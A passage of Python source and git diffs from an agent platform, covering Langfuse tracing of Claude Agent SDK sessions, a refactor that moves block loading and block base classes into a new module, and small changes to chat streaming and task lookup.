"tool_call_id": tool.tool_call_id,
"success": tool.success,
},
)
# Update trace with final status
status = "error" if exc_type else "success"
self._trace.update(
output=self._generations[-1].text[:500] if self._generations else None,
metadata={"status": status, "num_generations": len(self._generations)},
)
# Flush asynchronously (Langfuse handles this in background)
logger.debug(
f"[Tracing] Completed trace for session {self.session_id}, "
f"{len(self._generations)} generations"
)
except Exception as e:
logger.warning(f"[Tracing] Failed to finalize trace: {e}")
def log_user_message(self, message: str) -> None:
"""Log the user's input message."""
if not self.enabled or not self._trace:
return
self._user_message = message
try:
self._trace.update(input=message[:1000])
except Exception as e:
logger.debug(f"[Tracing] Failed to log user message: {e}")
def log_sdk_message(self, sdk_message: Message) -> None:
"""Log an SDK message (automatically categorizes by type)."""
if not self.enabled:
return
try:
from claude_agent_sdk import (
AssistantMessage,
ResultMessage,
TextBlock,
ToolResultBlock,
ToolUseBlock,
UserMessage,
)
if isinstance(sdk_message, AssistantMessage):
# Start a new generation if needed
if self._current_generation is None:
self._current_generation = GenerationSpan()
self._generations.append(self._current_generation)
for block in sdk_message.content:
if isinstance(block, TextBlock) and block.text:
self._current_generation.text += block.text
elif isinstance(block, ToolUseBlock):
tool_span = ToolSpan(
tool_call_id=block.id,
tool_name=block.name,
input=block.input or {},
)
self._pending_tools[block.id] = tool_span
if self._current_generation:
self._current_generation.tool_calls.append(tool_span)
elif isinstance(sdk_message, UserMessage):
# UserMessage carries tool results
content = sdk_message.content
blocks = content if isinstance(content, list) else []
for block in blocks:
if isinstance(block, ToolResultBlock) and block.tool_use_id:
tool_span = self._pending_tools.get(block.tool_use_id)
if tool_span:
tool_span.end_time = time.perf_counter()
tool_span.success = not (block.is_error or False)
tool_span.output = self._extract_tool_output(block.content)
# After tool results, finalize current generation
# (SDK will start a new AssistantMessage for continuation)
self._finalize_current_generation()
elif isinstance(sdk_message, ResultMessage):
self._log_result(sdk_message)
except Exception as e:
logger.debug(f"[Tracing] Failed to log SDK message: {e}")
def _log_result(self, result: ResultMessage) -> None:
"""Log the final result with usage and cost."""
if not self.enabled or not self._trace:
return
try:
# Extract usage info
usage = result.usage or {}
metadata: dict[str, Any] = {
"duration_ms": result.duration_ms,
"duration_api_ms": result.duration_api_ms,
"num_turns": result.num_turns,
"is_error": result.is_error,
}
if result.total_cost_usd is not None:
metadata["cost_usd"] = result.total_cost_usd
if usage:
metadata["usage"] = usage
self._trace.update(metadata=metadata)
# Log as a generation for proper Langfuse cost/usage tracking
if usage or result.total_cost_usd:
self._trace.generation(
name="claude-sdk-completion",
model=self.model or "claude-sonnet-4-20250514",
usage=(
{
"input": usage.get("input_tokens", 0),
"output": usage.get("output_tokens", 0),
"total": usage.get("input_tokens", 0)
+ usage.get("output_tokens", 0),
}
if usage
else None
),
metadata={"cost_usd": result.total_cost_usd},
)
logger.debug(
f"[Tracing] Logged result: {result.num_turns} turns, "
f"${result.total_cost_usd:.4f} cost"
if result.total_cost_usd
else f"[Tracing] Logged result: {result.num_turns} turns"
)
except Exception as e:
logger.debug(f"[Tracing] Failed to log result: {e}")
def _finalize_current_generation(self) -> None:
"""Mark the current generation as complete."""
if self._current_generation:
self._current_generation.end_time = time.perf_counter()
self._current_generation = None
@staticmethod
def _extract_tool_output(content: str | list[dict[str, str]] | None) -> str:
"""Extract string output from tool result content."""
if isinstance(content, str):
return content
if isinstance(content, list):
parts = [
item.get("text", "") for item in content if item.get("type") == "text"
]
return "".join(parts) if parts else str(content)
return str(content) if content else ""
@asynccontextmanager
async def traced_session(
session_id: str,
user_id: str | None = None,
system_prompt: str | None = None,
model: str | None = None,
):
"""Convenience async context manager for tracing SDK sessions.
Usage:
async with traced_session(session_id, user_id) as tracer:
tracer.log_user_message(message)
async for msg in client.receive_messages():
tracer.log_sdk_message(msg)
"""
tracer = TracedSession(session_id, user_id, system_prompt, model=model)
async with tracer:
yield tracer
def create_tracing_hooks(tracer: TracedSession) -> dict[str, Any]:
"""Create SDK hooks for fine-grained Langfuse tracing.
These hooks capture precise timing for tool executions and failures
that may not be visible in the message stream.
Designed to be merged with security hooks:
hooks = {**security_hooks, **create_tracing_hooks(tracer)}
Args:
tracer: The active TracedSession instance
Returns:
Hooks configuration dict for ClaudeAgentOptions
"""
if not tracer.enabled:
return {}
try:
from claude_agent_sdk import HookMatcher
from claude_agent_sdk.types import HookContext, HookInput, SyncHookJSONOutput
async def trace_pre_tool_use(
input_data: HookInput,
tool_use_id: str | None,
context: HookContext,
) -> SyncHookJSONOutput:
"""Record tool start time for accurate duration tracking."""
_ = context
if not tool_use_id:
return {}
tool_name = str(input_data.get("tool_name", "unknown"))
tool_input = input_data.get("tool_input", {})
# Record start time in pending tools
tracer._pending_tools[tool_use_id] = ToolSpan(
tool_call_id=tool_use_id,
tool_name=tool_name,
input=tool_input if isinstance(tool_input, dict) else {},
)
return {}
async def trace_post_tool_use(
input_data: HookInput,
tool_use_id: str | None,
context: HookContext,
) -> SyncHookJSONOutput:
"""Record tool completion for duration calculation."""
_ = context
if tool_use_id and tool_use_id in tracer._pending_tools:
tracer._pending_tools[tool_use_id].end_time = time.perf_counter()
tracer._pending_tools[tool_use_id].success = True
return {}
async def trace_post_tool_failure(
input_data: HookInput,
tool_use_id: str | None,
context: HookContext,
) -> SyncHookJSONOutput:
"""Record tool failures for error tracking."""
_ = context
if tool_use_id and tool_use_id in tracer._pending_tools:
tracer._pending_tools[tool_use_id].end_time = time.perf_counter()
tracer._pending_tools[tool_use_id].success = False
error = input_data.get("error", "Unknown error")
tracer._pending_tools[tool_use_id].output = f"ERROR: {error}"
return {}
return {
"PreToolUse": [HookMatcher(matcher="*", hooks=[trace_pre_tool_use])],
"PostToolUse": [HookMatcher(matcher="*", hooks=[trace_post_tool_use])],
"PostToolUseFailure": [
HookMatcher(matcher="*", hooks=[trace_post_tool_failure])
],
}
except ImportError:
logger.debug("[Tracing] SDK not available for hook-based tracing")
return {}
def merge_hooks(*hook_dicts: dict[str, Any]) -> dict[str, Any]:
"""Merge multiple hook configurations into one.
Combines hook matchers for the same event type, allowing both
security and tracing hooks to coexist.
Usage:
combined = merge_hooks(security_hooks, tracing_hooks)
"""
result: dict[str, list[Any]] = {}
for hook_dict in hook_dicts:
for event_name, matchers in hook_dict.items():
if event_name not in result:
result[event_name] = []
result[event_name].extend(matchers)
return result

View File

@@ -245,16 +245,12 @@ async def _get_system_prompt_template(context: str) -> str:
return DEFAULT_SYSTEM_PROMPT.format(users_information=context)
async def _build_system_prompt(
user_id: str | None, has_conversation_history: bool = False
) -> tuple[str, Any]:
async def _build_system_prompt(user_id: str | None) -> tuple[str, Any]:
"""Build the full system prompt including business understanding if available.
Args:
user_id: The user ID for fetching business understanding.
has_conversation_history: Whether there's existing conversation history.
If True, we don't tell the model to greet/introduce (since they're
already in a conversation).
user_id: The user ID for fetching business understanding
If "default" and this is the user's first session, will use "onboarding" instead.
Returns:
Tuple of (compiled prompt string, business understanding object)
@@ -270,8 +266,6 @@ async def _build_system_prompt(
if understanding:
context = format_understanding_for_prompt(understanding)
elif has_conversation_history:
context = "No prior understanding saved yet. Continue the existing conversation naturally."
else:
context = "This is the first time you are meeting the user. Greet them and introduce them to the platform"
@@ -380,6 +374,7 @@ async def stream_chat_completion(
Raises:
NotFoundError: If session_id is invalid
ValueError: If max_context_messages is exceeded
"""
completion_start = time.monotonic()
@@ -464,9 +459,8 @@ async def stream_chat_completion(
# Generate title for new sessions on first user message (non-blocking)
# Check: is_user_message, no title yet, and this is the first user message
user_messages = [m for m in session.messages if m.role == "user"]
first_user_msg = message or (user_messages[0].content if user_messages else None)
if is_user_message and first_user_msg and not session.title:
if is_user_message and message and not session.title:
user_messages = [m for m in session.messages if m.role == "user"]
if len(user_messages) == 1:
# First user message - generate title in background
import asyncio
@@ -474,7 +468,7 @@ async def stream_chat_completion(
# Capture only the values we need (not the session object) to avoid
# stale data issues when the main flow modifies the session
captured_session_id = session_id
captured_message = first_user_msg
captured_message = message
captured_user_id = user_id
async def _update_title():
@@ -806,9 +800,13 @@ async def stream_chat_completion(
# Build the messages list in the correct order
messages_to_save: list[ChatMessage] = []
# Add assistant message with tool_calls if any
# Add assistant message with tool_calls if any.
# Use extend (not assign) to preserve tool_calls already added by
# _yield_tool_call for long-running tools.
if accumulated_tool_calls:
assistant_response.tool_calls = accumulated_tool_calls
if not assistant_response.tool_calls:
assistant_response.tool_calls = []
assistant_response.tool_calls.extend(accumulated_tool_calls)
logger.info(
f"Added {len(accumulated_tool_calls)} tool calls to assistant message"
)
@@ -1239,7 +1237,7 @@ async def _stream_chat_chunks(
total_time = (time_module.perf_counter() - stream_chunks_start) * 1000
logger.info(
f"[TIMING] _stream_chat_chunks COMPLETED in {total_time / 1000:.1f}s; "
f"[TIMING] _stream_chat_chunks COMPLETED in {total_time/1000:.1f}s; "
f"session={session.session_id}, user={session.user_id}",
extra={"json_fields": {**log_meta, "total_time_ms": total_time}},
)
@@ -1410,13 +1408,9 @@ async def _yield_tool_call(
operation_id=operation_id,
)
# Save assistant message with tool_call FIRST (required by LLM)
assistant_message = ChatMessage(
role="assistant",
content="",
tool_calls=[tool_calls[yield_idx]],
)
session.messages.append(assistant_message)
# Attach the tool_call to the current turn's assistant message
# (or create one if this is a tool-only response with no text).
session.add_tool_call_to_current_turn(tool_calls[yield_idx])
# Then save pending tool result
pending_message = ChatMessage(

View File

@@ -814,28 +814,6 @@ async def get_active_task_for_session(
if task_user_id and user_id != task_user_id:
continue
# Auto-expire stale tasks that exceeded stream_timeout
created_at_str = meta.get("created_at", "")
if created_at_str:
try:
created_at = datetime.fromisoformat(created_at_str)
age_seconds = (
datetime.now(timezone.utc) - created_at
).total_seconds()
if age_seconds > config.stream_timeout:
logger.warning(
f"[TASK_LOOKUP] Auto-expiring stale task {task_id[:8]}... "
f"(age={age_seconds:.0f}s > timeout={config.stream_timeout}s)"
)
await mark_task_completed(task_id, "failed")
continue
except (ValueError, TypeError):
pass
logger.info(
f"[TASK_LOOKUP] Found running task {task_id[:8]}... for session {session_id[:8]}..."
)
# Get the last message ID from Redis Stream
stream_key = _get_task_stream_key(task_id)
last_id = "0-0"

View File

@@ -13,7 +13,8 @@ from backend.api.features.chat.tools.models import (
NoResultsResponse,
)
from backend.api.features.store.hybrid_search import unified_hybrid_search
from backend.data.block import BlockType, get_block
from backend.blocks import get_block
from backend.blocks._base import BlockType
logger = logging.getLogger(__name__)

View File

@@ -10,7 +10,7 @@ from backend.api.features.chat.tools.find_block import (
FindBlockTool,
)
from backend.api.features.chat.tools.models import BlockListResponse
from backend.data.block import BlockType
from backend.blocks._base import BlockType
from ._test_data import make_session

View File

@@ -335,17 +335,11 @@ class BlockInfoSummary(BaseModel):
name: str
description: str
categories: list[str]
input_schema: dict[str, Any] = Field(
default_factory=dict,
description="Full JSON schema for block inputs",
)
output_schema: dict[str, Any] = Field(
default_factory=dict,
description="Full JSON schema for block outputs",
)
input_schema: dict[str, Any]
output_schema: dict[str, Any]
required_inputs: list[BlockInputFieldInfo] = Field(
default_factory=list,
description="List of input fields for this block",
description="List of required input fields for this block",
)
@@ -358,7 +352,7 @@ class BlockListResponse(ToolResponseBase):
query: str
usage_hint: str = Field(
default="To execute a block, call run_block with block_id set to the block's "
"'id' field and input_data containing the fields listed in required_inputs."
"'id' field and input_data containing the required fields from input_schema."
)

View File

@@ -12,7 +12,8 @@ from backend.api.features.chat.tools.find_block import (
COPILOT_EXCLUDED_BLOCK_IDS,
COPILOT_EXCLUDED_BLOCK_TYPES,
)
from backend.data.block import AnyBlockSchema, get_block
from backend.blocks import get_block
from backend.blocks._base import AnyBlockSchema
from backend.data.execution import ExecutionContext
from backend.data.model import CredentialsFieldInfo, CredentialsMetaInput
from backend.data.workspace import get_or_create_workspace

View File

@@ -6,7 +6,7 @@ import pytest
from backend.api.features.chat.tools.models import ErrorResponse
from backend.api.features.chat.tools.run_block import RunBlockTool
from backend.data.block import BlockType
from backend.blocks._base import BlockType
from ._test_data import make_session

View File

@@ -12,12 +12,11 @@ import backend.api.features.store.image_gen as store_image_gen
import backend.api.features.store.media as store_media
import backend.data.graph as graph_db
import backend.data.integrations as integrations_db
from backend.data.block import BlockInput
from backend.data.db import transaction
from backend.data.execution import get_graph_execution
from backend.data.graph import GraphSettings
from backend.data.includes import AGENT_PRESET_INCLUDE, library_agent_include
from backend.data.model import CredentialsMetaInput
from backend.data.model import CredentialsMetaInput, GraphInput
from backend.integrations.creds_manager import IntegrationCredentialsManager
from backend.integrations.webhooks.graph_lifecycle_hooks import (
on_graph_activate,
@@ -1130,7 +1129,7 @@ async def create_preset_from_graph_execution(
async def update_preset(
user_id: str,
preset_id: str,
inputs: Optional[BlockInput] = None,
inputs: Optional[GraphInput] = None,
credentials: Optional[dict[str, CredentialsMetaInput]] = None,
name: Optional[str] = None,
description: Optional[str] = None,

View File

@@ -6,9 +6,12 @@ import prisma.enums
import prisma.models
import pydantic
from backend.data.block import BlockInput
from backend.data.graph import GraphModel, GraphSettings, GraphTriggerInfo
from backend.data.model import CredentialsMetaInput, is_credentials_field_name
from backend.data.model import (
CredentialsMetaInput,
GraphInput,
is_credentials_field_name,
)
from backend.util.json import loads as json_loads
from backend.util.models import Pagination
@@ -323,7 +326,7 @@ class LibraryAgentPresetCreatable(pydantic.BaseModel):
graph_id: str
graph_version: int
inputs: BlockInput
inputs: GraphInput
credentials: dict[str, CredentialsMetaInput]
name: str
@@ -352,7 +355,7 @@ class LibraryAgentPresetUpdatable(pydantic.BaseModel):
Request model used when updating a preset for a library agent.
"""
inputs: Optional[BlockInput] = None
inputs: Optional[GraphInput] = None
credentials: Optional[dict[str, CredentialsMetaInput]] = None
name: Optional[str] = None
@@ -395,7 +398,7 @@ class LibraryAgentPreset(LibraryAgentPresetCreatable):
"Webhook must be included in AgentPreset query when webhookId is set"
)
input_data: BlockInput = {}
input_data: GraphInput = {}
input_credentials: dict[str, CredentialsMetaInput] = {}
for preset_input in preset.InputPresets:

View File

@@ -5,8 +5,8 @@ from typing import Optional
import aiohttp
from fastapi import HTTPException
from backend.blocks import get_block
from backend.data import graph as graph_db
from backend.data.block import get_block
from backend.util.settings import Settings
from .models import ApiResponse, ChatRequest, GraphData

View File

@@ -152,7 +152,7 @@ class BlockHandler(ContentHandler):
async def get_missing_items(self, batch_size: int) -> list[ContentItem]:
"""Fetch blocks without embeddings."""
from backend.data.block import get_blocks
from backend.blocks import get_blocks
# Get all available blocks
all_blocks = get_blocks()
@@ -249,7 +249,7 @@ class BlockHandler(ContentHandler):
async def get_stats(self) -> dict[str, int]:
"""Get statistics about block embedding coverage."""
from backend.data.block import get_blocks
from backend.blocks import get_blocks
all_blocks = get_blocks()

View File

@@ -93,7 +93,7 @@ async def test_block_handler_get_missing_items(mocker):
mock_existing = []
with patch(
"backend.data.block.get_blocks",
"backend.blocks.get_blocks",
return_value=mock_blocks,
):
with patch(
@@ -135,7 +135,7 @@ async def test_block_handler_get_stats(mocker):
mock_embedded = [{"count": 2}]
with patch(
"backend.data.block.get_blocks",
"backend.blocks.get_blocks",
return_value=mock_blocks,
):
with patch(
@@ -327,7 +327,7 @@ async def test_block_handler_handles_missing_attributes():
mock_blocks = {"block-minimal": mock_block_class}
with patch(
"backend.data.block.get_blocks",
"backend.blocks.get_blocks",
return_value=mock_blocks,
):
with patch(
@@ -360,7 +360,7 @@ async def test_block_handler_skips_failed_blocks():
mock_blocks = {"good-block": good_block, "bad-block": bad_block}
with patch(
"backend.data.block.get_blocks",
"backend.blocks.get_blocks",
return_value=mock_blocks,
):
with patch(

View File

@@ -662,7 +662,7 @@ async def cleanup_orphaned_embeddings() -> dict[str, Any]:
)
current_ids = {row["id"] for row in valid_agents}
elif content_type == ContentType.BLOCK:
from backend.data.block import get_blocks
from backend.blocks import get_blocks
current_ids = set(get_blocks().keys())
elif content_type == ContentType.DOCUMENTATION:

View File

@@ -7,15 +7,6 @@ from replicate.client import Client as ReplicateClient
from replicate.exceptions import ReplicateError
from replicate.helpers import FileOutput
from backend.blocks.ideogram import (
AspectRatio,
ColorPalettePreset,
IdeogramModelBlock,
IdeogramModelName,
MagicPromptOption,
StyleType,
UpscaleOption,
)
from backend.data.graph import GraphBaseMeta
from backend.data.model import CredentialsMetaInput, ProviderName
from backend.integrations.credentials_store import ideogram_credentials
@@ -50,6 +41,16 @@ async def generate_agent_image_v2(graph: GraphBaseMeta | AgentGraph) -> io.Bytes
if not ideogram_credentials.api_key:
raise ValueError("Missing Ideogram API key")
from backend.blocks.ideogram import (
AspectRatio,
ColorPalettePreset,
IdeogramModelBlock,
IdeogramModelName,
MagicPromptOption,
StyleType,
UpscaleOption,
)
name = graph.name
description = f"{name} ({graph.description})" if graph.description else name

View File

@@ -40,10 +40,11 @@ from backend.api.model import (
UpdateTimezoneRequest,
UploadFileResponse,
)
from backend.blocks import get_block, get_blocks
from backend.data import execution as execution_db
from backend.data import graph as graph_db
from backend.data.auth import api_key as api_key_db
from backend.data.block import BlockInput, CompletedBlockOutput, get_block, get_blocks
from backend.data.block import BlockInput, CompletedBlockOutput
from backend.data.credit import (
AutoTopUpConfig,
RefundRequest,

View File

@@ -3,22 +3,19 @@ import logging
import os
import re
from pathlib import Path
from typing import TYPE_CHECKING, TypeVar
from typing import Sequence, Type, TypeVar
from backend.blocks._base import AnyBlockSchema, BlockType
from backend.util.cache import cached
logger = logging.getLogger(__name__)
if TYPE_CHECKING:
from backend.data.block import Block
T = TypeVar("T")
@cached(ttl_seconds=3600)
def load_all_blocks() -> dict[str, type["Block"]]:
from backend.data.block import Block
def load_all_blocks() -> dict[str, type["AnyBlockSchema"]]:
from backend.blocks._base import Block
from backend.util.settings import Config
# Check if example blocks should be loaded from settings
@@ -50,8 +47,8 @@ def load_all_blocks() -> dict[str, type["Block"]]:
importlib.import_module(f".{module}", package=__name__)
# Load all Block instances from the available modules
available_blocks: dict[str, type["Block"]] = {}
for block_cls in all_subclasses(Block):
available_blocks: dict[str, type["AnyBlockSchema"]] = {}
for block_cls in _all_subclasses(Block):
class_name = block_cls.__name__
if class_name.endswith("Base"):
@@ -64,7 +61,7 @@ def load_all_blocks() -> dict[str, type["Block"]]:
"please name the class with 'Base' at the end"
)
block = block_cls.create()
block = block_cls() # pyright: ignore[reportAbstractUsage]
if not isinstance(block.id, str) or len(block.id) != 36:
raise ValueError(
@@ -105,7 +102,7 @@ def load_all_blocks() -> dict[str, type["Block"]]:
available_blocks[block.id] = block_cls
# Filter out blocks with incomplete auth configs, e.g. missing OAuth server secrets
from backend.data.block import is_block_auth_configured
from ._utils import is_block_auth_configured
filtered_blocks = {}
for block_id, block_cls in available_blocks.items():
@@ -115,11 +112,48 @@ def load_all_blocks() -> dict[str, type["Block"]]:
return filtered_blocks
__all__ = ["load_all_blocks"]
def all_subclasses(cls: type[T]) -> list[type[T]]:
def _all_subclasses(cls: type[T]) -> list[type[T]]:
subclasses = cls.__subclasses__()
for subclass in subclasses:
subclasses += all_subclasses(subclass)
subclasses += _all_subclasses(subclass)
return subclasses
# ============== Block access helper functions ============== #
def get_blocks() -> dict[str, Type["AnyBlockSchema"]]:
return load_all_blocks()
# Note on the return type annotation: https://github.com/microsoft/pyright/issues/10281
def get_block(block_id: str) -> "AnyBlockSchema | None":
cls = get_blocks().get(block_id)
return cls() if cls else None
@cached(ttl_seconds=3600)
def get_webhook_block_ids() -> Sequence[str]:
return [
id
for id, B in get_blocks().items()
if B().block_type in (BlockType.WEBHOOK, BlockType.WEBHOOK_MANUAL)
]
@cached(ttl_seconds=3600)
def get_io_block_ids() -> Sequence[str]:
return [
id
for id, B in get_blocks().items()
if B().block_type in (BlockType.INPUT, BlockType.OUTPUT)
]
@cached(ttl_seconds=3600)
def get_human_in_the_loop_block_ids() -> Sequence[str]:
return [
id
for id, B in get_blocks().items()
if B().block_type == BlockType.HUMAN_IN_THE_LOOP
]

View File

@@ -0,0 +1,739 @@
import inspect
import logging
from abc import ABC, abstractmethod
from enum import Enum
from typing import (
TYPE_CHECKING,
Any,
Callable,
ClassVar,
Generic,
Optional,
Type,
TypeAlias,
TypeVar,
cast,
get_origin,
)
import jsonref
import jsonschema
from pydantic import BaseModel
from backend.data.block import BlockInput, BlockOutput, BlockOutputEntry
from backend.data.model import (
Credentials,
CredentialsFieldInfo,
CredentialsMetaInput,
SchemaField,
is_credentials_field_name,
)
from backend.integrations.providers import ProviderName
from backend.util import json
from backend.util.exceptions import (
BlockError,
BlockExecutionError,
BlockInputError,
BlockOutputError,
BlockUnknownError,
)
from backend.util.settings import Config
logger = logging.getLogger(__name__)
if TYPE_CHECKING:
from backend.data.execution import ExecutionContext
from backend.data.model import ContributorDetails, NodeExecutionStats
from ..data.graph import Link
app_config = Config()
BlockTestOutput = BlockOutputEntry | tuple[str, Callable[[Any], bool]]
class BlockType(Enum):
STANDARD = "Standard"
INPUT = "Input"
OUTPUT = "Output"
NOTE = "Note"
WEBHOOK = "Webhook"
WEBHOOK_MANUAL = "Webhook (manual)"
AGENT = "Agent"
AI = "AI"
AYRSHARE = "Ayrshare"
HUMAN_IN_THE_LOOP = "Human In The Loop"
class BlockCategory(Enum):
AI = "Block that leverages AI to perform a task."
SOCIAL = "Block that interacts with social media platforms."
TEXT = "Block that processes text data."
SEARCH = "Block that searches or extracts information from the internet."
BASIC = "Block that performs basic operations."
INPUT = "Block that interacts with input of the graph."
OUTPUT = "Block that interacts with output of the graph."
LOGIC = "Programming logic to control the flow of your agent"
COMMUNICATION = "Block that interacts with communication platforms."
DEVELOPER_TOOLS = "Developer tools such as GitHub blocks."
DATA = "Block that interacts with structured data."
HARDWARE = "Block that interacts with hardware."
AGENT = "Block that interacts with other agents."
CRM = "Block that interacts with CRM services."
SAFETY = (
"Block that provides AI safety mechanisms such as detecting harmful content"
)
PRODUCTIVITY = "Block that helps with productivity"
ISSUE_TRACKING = "Block that helps with issue tracking"
MULTIMEDIA = "Block that interacts with multimedia content"
MARKETING = "Block that helps with marketing"
def dict(self) -> dict[str, str]:
return {"category": self.name, "description": self.value}
class BlockCostType(str, Enum):
RUN = "run" # cost X credits per run
BYTE = "byte" # cost X credits per byte
SECOND = "second" # cost X credits per second
class BlockCost(BaseModel):
cost_amount: int
cost_filter: BlockInput
cost_type: BlockCostType
def __init__(
self,
cost_amount: int,
cost_type: BlockCostType = BlockCostType.RUN,
cost_filter: Optional[BlockInput] = None,
**data: Any,
) -> None:
super().__init__(
cost_amount=cost_amount,
cost_filter=cost_filter or {},
cost_type=cost_type,
**data,
)
class BlockInfo(BaseModel):
id: str
name: str
inputSchema: dict[str, Any]
outputSchema: dict[str, Any]
costs: list[BlockCost]
description: str
categories: list[dict[str, str]]
contributors: list[dict[str, Any]]
staticOutput: bool
uiType: str
class BlockSchema(BaseModel):
cached_jsonschema: ClassVar[dict[str, Any]]
@classmethod
def jsonschema(cls) -> dict[str, Any]:
if cls.cached_jsonschema:
return cls.cached_jsonschema
model = jsonref.replace_refs(cls.model_json_schema(), merge_props=True)
def ref_to_dict(obj):
if isinstance(obj, dict):
# OpenAPI <3.1 does not support sibling fields that has a $ref key
# So sometimes, the schema has an "allOf"/"anyOf"/"oneOf" with 1 item.
keys = {"allOf", "anyOf", "oneOf"}
one_key = next((k for k in keys if k in obj and len(obj[k]) == 1), None)
if one_key:
obj.update(obj[one_key][0])
return {
key: ref_to_dict(value)
for key, value in obj.items()
if not key.startswith("$") and key != one_key
}
elif isinstance(obj, list):
return [ref_to_dict(item) for item in obj]
return obj
cls.cached_jsonschema = cast(dict[str, Any], ref_to_dict(model))
return cls.cached_jsonschema
@classmethod
def validate_data(cls, data: BlockInput) -> str | None:
return json.validate_with_jsonschema(
schema=cls.jsonschema(),
data={k: v for k, v in data.items() if v is not None},
)
@classmethod
def get_mismatch_error(cls, data: BlockInput) -> str | None:
return cls.validate_data(data)
@classmethod
def get_field_schema(cls, field_name: str) -> dict[str, Any]:
model_schema = cls.jsonschema().get("properties", {})
if not model_schema:
raise ValueError(f"Invalid model schema {cls}")
property_schema = model_schema.get(field_name)
if not property_schema:
raise ValueError(f"Invalid property name {field_name}")
return property_schema
@classmethod
def validate_field(cls, field_name: str, data: BlockInput) -> str | None:
"""
Validate the data against a specific property (one of the input/output name).
Returns the validation error message if the data does not match the schema.
"""
try:
property_schema = cls.get_field_schema(field_name)
jsonschema.validate(json.to_dict(data), property_schema)
return None
except jsonschema.ValidationError as e:
return str(e)
@classmethod
def get_fields(cls) -> set[str]:
return set(cls.model_fields.keys())
@classmethod
def get_required_fields(cls) -> set[str]:
return {
field
for field, field_info in cls.model_fields.items()
if field_info.is_required()
}
@classmethod
def __pydantic_init_subclass__(cls, **kwargs):
"""Validates the schema definition. Rules:
- Fields with annotation `CredentialsMetaInput` MUST be
named `credentials` or `*_credentials`
- Fields named `credentials` or `*_credentials` MUST be
of type `CredentialsMetaInput`
"""
super().__pydantic_init_subclass__(**kwargs)
# Reset cached JSON schema to prevent inheriting it from parent class
cls.cached_jsonschema = {}
credentials_fields = cls.get_credentials_fields()
for field_name in cls.get_fields():
if is_credentials_field_name(field_name):
if field_name not in credentials_fields:
raise TypeError(
f"Credentials field '{field_name}' on {cls.__qualname__} "
f"is not of type {CredentialsMetaInput.__name__}"
)
CredentialsMetaInput.validate_credentials_field_schema(
cls.get_field_schema(field_name), field_name
)
elif field_name in credentials_fields:
raise KeyError(
f"Credentials field '{field_name}' on {cls.__qualname__} "
"has invalid name: must be 'credentials' or *_credentials"
)
@classmethod
def get_credentials_fields(cls) -> dict[str, type[CredentialsMetaInput]]:
return {
field_name: info.annotation
for field_name, info in cls.model_fields.items()
if (
inspect.isclass(info.annotation)
and issubclass(
get_origin(info.annotation) or info.annotation,
CredentialsMetaInput,
)
)
}
@classmethod
def get_auto_credentials_fields(cls) -> dict[str, dict[str, Any]]:
"""
Get fields that have auto_credentials metadata (e.g., GoogleDriveFileInput).
Returns a dict mapping kwarg_name -> {field_name, auto_credentials_config}
Raises:
ValueError: If multiple fields have the same kwarg_name, as this would
cause silent overwriting and only the last field would be processed.
"""
result: dict[str, dict[str, Any]] = {}
schema = cls.jsonschema()
properties = schema.get("properties", {})
for field_name, field_schema in properties.items():
auto_creds = field_schema.get("auto_credentials")
if auto_creds:
kwarg_name = auto_creds.get("kwarg_name", "credentials")
if kwarg_name in result:
raise ValueError(
f"Duplicate auto_credentials kwarg_name '{kwarg_name}' "
f"in fields '{result[kwarg_name]['field_name']}' and "
f"'{field_name}' on {cls.__qualname__}"
)
result[kwarg_name] = {
"field_name": field_name,
"config": auto_creds,
}
return result
@classmethod
def get_credentials_fields_info(cls) -> dict[str, CredentialsFieldInfo]:
result = {}
# Regular credentials fields
for field_name in cls.get_credentials_fields().keys():
result[field_name] = CredentialsFieldInfo.model_validate(
cls.get_field_schema(field_name), by_alias=True
)
# Auto-generated credentials fields (from GoogleDriveFileInput etc.)
for kwarg_name, info in cls.get_auto_credentials_fields().items():
config = info["config"]
# Build a schema-like dict that CredentialsFieldInfo can parse
auto_schema = {
"credentials_provider": [config.get("provider", "google")],
"credentials_types": [config.get("type", "oauth2")],
"credentials_scopes": config.get("scopes"),
}
result[kwarg_name] = CredentialsFieldInfo.model_validate(
auto_schema, by_alias=True
)
return result
@classmethod
def get_input_defaults(cls, data: BlockInput) -> BlockInput:
return data # Return as is, by default.
@classmethod
def get_missing_links(cls, data: BlockInput, links: list["Link"]) -> set[str]:
input_fields_from_nodes = {link.sink_name for link in links}
return input_fields_from_nodes - set(data)
@classmethod
def get_missing_input(cls, data: BlockInput) -> set[str]:
return cls.get_required_fields() - set(data)
class BlockSchemaInput(BlockSchema):
"""
Base schema class for block inputs.
All block input schemas should extend this class for consistency.
"""
pass
class BlockSchemaOutput(BlockSchema):
"""
Base schema class for block outputs that includes a standard error field.
All block output schemas should extend this class to ensure consistent error handling.
"""
error: str = SchemaField(
description="Error message if the operation failed", default=""
)
BlockSchemaInputType = TypeVar("BlockSchemaInputType", bound=BlockSchemaInput)
BlockSchemaOutputType = TypeVar("BlockSchemaOutputType", bound=BlockSchemaOutput)
class EmptyInputSchema(BlockSchemaInput):
pass
class EmptyOutputSchema(BlockSchemaOutput):
pass
# For backward compatibility - will be deprecated
EmptySchema = EmptyOutputSchema
# --8<-- [start:BlockWebhookConfig]
class BlockManualWebhookConfig(BaseModel):
"""
Configuration model for webhook-triggered blocks on which
the user has to manually set up the webhook at the provider.
"""
provider: ProviderName
"""The service provider that the webhook connects to"""
webhook_type: str
"""
Identifier for the webhook type. E.g. GitHub has repo and organization level hooks.
Only for use in the corresponding `WebhooksManager`.
"""
event_filter_input: str = ""
"""
Name of the block's event filter input.
Leave empty if the corresponding webhook doesn't have distinct event/payload types.
"""
event_format: str = "{event}"
"""
Template string for the event(s) that a block instance subscribes to.
Applied individually to each event selected in the event filter input.
Example: `"pull_request.{event}"` -> `"pull_request.opened"`
"""
class BlockWebhookConfig(BlockManualWebhookConfig):
"""
Configuration model for webhook-triggered blocks for which
the webhook can be automatically set up through the provider's API.
"""
resource_format: str
"""
Template string for the resource that a block instance subscribes to.
Fields will be filled from the block's inputs (except `payload`).
Example: `f"{repo}/pull_requests"` (note: not how it's actually implemented)
Only for use in the corresponding `WebhooksManager`.
"""
# --8<-- [end:BlockWebhookConfig]
class Block(ABC, Generic[BlockSchemaInputType, BlockSchemaOutputType]):
def __init__(
self,
id: str = "",
description: str = "",
contributors: list["ContributorDetails"] = [],
categories: set[BlockCategory] | None = None,
input_schema: Type[BlockSchemaInputType] = EmptyInputSchema,
output_schema: Type[BlockSchemaOutputType] = EmptyOutputSchema,
test_input: BlockInput | list[BlockInput] | None = None,
test_output: BlockTestOutput | list[BlockTestOutput] | None = None,
test_mock: dict[str, Any] | None = None,
